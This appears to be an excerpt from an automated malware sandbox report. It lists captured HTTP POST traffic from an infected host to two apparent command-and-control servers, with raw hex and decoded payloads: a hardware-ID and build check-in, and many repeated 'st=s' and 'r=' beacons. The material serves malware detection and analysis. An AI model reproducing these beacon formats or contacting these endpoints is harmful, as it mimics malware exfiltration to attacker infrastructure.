Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGDHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 38 38 35 35 43 34 37 42 36 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="hwid"E8855C47B6BC4158135236------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="build"jony------FCAAEBFHJJDAAKFIECGD--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 31 32 46 37 39 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7DB12F79B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
